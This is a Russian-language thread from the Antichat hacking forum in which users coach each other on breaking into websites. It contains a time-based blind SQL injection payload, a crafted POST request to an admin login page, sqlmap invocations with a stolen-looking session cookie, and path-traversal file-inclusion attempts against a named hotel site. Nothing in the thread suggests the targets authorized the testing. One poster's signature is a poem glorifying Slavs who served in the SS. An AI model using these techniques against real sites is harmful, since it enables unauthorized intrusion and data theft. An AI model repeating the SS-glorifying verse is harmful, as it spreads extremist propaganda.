HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.12.2016, 23:33
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от madam  

в смысле логин и пароль ,уже пыталась
'+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'
вот таким перебором вытащила имя базы
но вот sqlmap никак нехочет найти ihj
Должен sqlmap -u site.com/login/ --form пробуйте
 
Ответить с цитированием

  #2  
Старый 07.12.2016, 00:06
madam
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами: 6384566

Репутация: 1
По умолчанию

Цитата:
Сообщение от BabaDook  

Должен sqlmap -u site.com/login/ --form пробуйте
--forms тоже нет((
 
Ответить с цитированием

  #3  
Старый 07.12.2016, 12:10
madam
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами: 6384566

Репутация: 1
По умолчанию

sqlmap умеет загружать куки сам?может в этом проблема
 
Ответить с цитированием

  #4  
Старый 07.12.2016, 12:23
nik1201
Познающий
Регистрация: 12.07.2015
Сообщений: 39
С нами: 5704886

Репутация: 0
По умолчанию

А если нуль-байт экранируется (%00) то он должен в ошибке выглядеть так (\0.php) а если его нет в ошибке то он обрезает расширение?

Просто есть еще сайт одной популярной игры,там аналогичная ситуация как и с сайтом http://hotel-stalingrad.ru/index.php?page=cafe там так же инклудятся локальные файлы как и c этим сайтом

Код:
hotel-stalingrad.ru/index.php?page=../admin/index
На сайте игры стоит php 5.4.45 apache 2.2.2

Перечитал уже все сайты о php include так и ничего кроме нуль-байта и [4096] слешей не нашел.

Но я так понял что [4096] слешей не работают с php версией 5.4.45
 
Ответить с цитированием

  #5  
Старый 07.12.2016, 12:34
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от nik1201  

А если нуль-байт экранируется (%00) то он должен в ошибке выглядеть так (\0.php) а если его нет в ошибке то он обрезает расширение?
Просто есть еще сайт одной популярной игры,там аналогичная ситуация как и с сайтом
http://hotel-stalingrad.ru/index.php?page=cafe
там так же инклудятся локальные файлы как и c этим сайтом
Код:
hotel-stalingrad.ru/index.php?page=../admin/index
На сайте игры стоит php 5.4.45 apache 2.2.2
Перечитал уже все сайты о php include так и ничего кроме нуль-байта и [4096] слешей не нашел.
Но я так понял что [4096] слешей не работают с php версией 5.4.45
Ну не откинешь ты .php с этого и надо было начинать
 
Ответить с цитированием

  #6  
Старый 07.12.2016, 13:21
Zen1T21
Участник форума
Регистрация: 13.01.2013
Сообщений: 157
С нами: 7015286

Репутация: 2
По умолчанию

Цитата:
Сообщение от madam  

Вот я и говорю мож не те параметры задаю((
POST /admin/login/ HTTP/1.1
Cache-Control: no-cache
Referer:
https://site.com/admin/login/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634
Host: site.com
Accept-Encoding: gzip, deflate
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login
sqlmap.py -u
https://site.com/admin/login/
--data=username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP( 25))A))%2b%27&password=&login=Login --cookie=PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634 --random-agent
что тогда здесь не так?
Cохрани все в файл и пробни sqlmap.py -r 'file.txt'
 
Ответить с цитированием

  #7  
Старый 07.12.2016, 14:17
madam
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами: 6384566

Репутация: 1
По умолчанию

да всё равно [17:20:42] [WARNING] POST parameter 'username' is not injectable

какие только параметры не задавала((

VERSION 5.5.47-MariaDB

DB site_com

USER site_com

всё что узнала(
 
Ответить с цитированием

  #8  
Старый 07.12.2016, 14:20
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от madam  

да всё равно [17:20:42] [WARNING] POST parameter 'username' is not injectable
какие только параметры не задавала((
VERSION 5.5.47-MariaDB
DB site_com
USER site_com
всё что узнала(
ты руками то пробовала, там есть вообще скуль?

если есть - изучай софт гадать тут долго можно почему не крутит
 
Ответить с цитированием

  #9  
Старый 07.12.2016, 14:25
madam
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами: 6384566

Репутация: 1
По умолчанию

скуля есть что параметре username что в password

могу скинуть сайт, если подскажете
 
Ответить с цитированием

  #10  
Старый 07.12.2016, 14:54
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

Цитата:
Сообщение от madam  

скуля есть что параметре username что в password
могу скинуть сайт, если подскажете
что мешает плодить посты в соседней теме, специально для SQLMAP'a? я чуть позже все удалю.
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.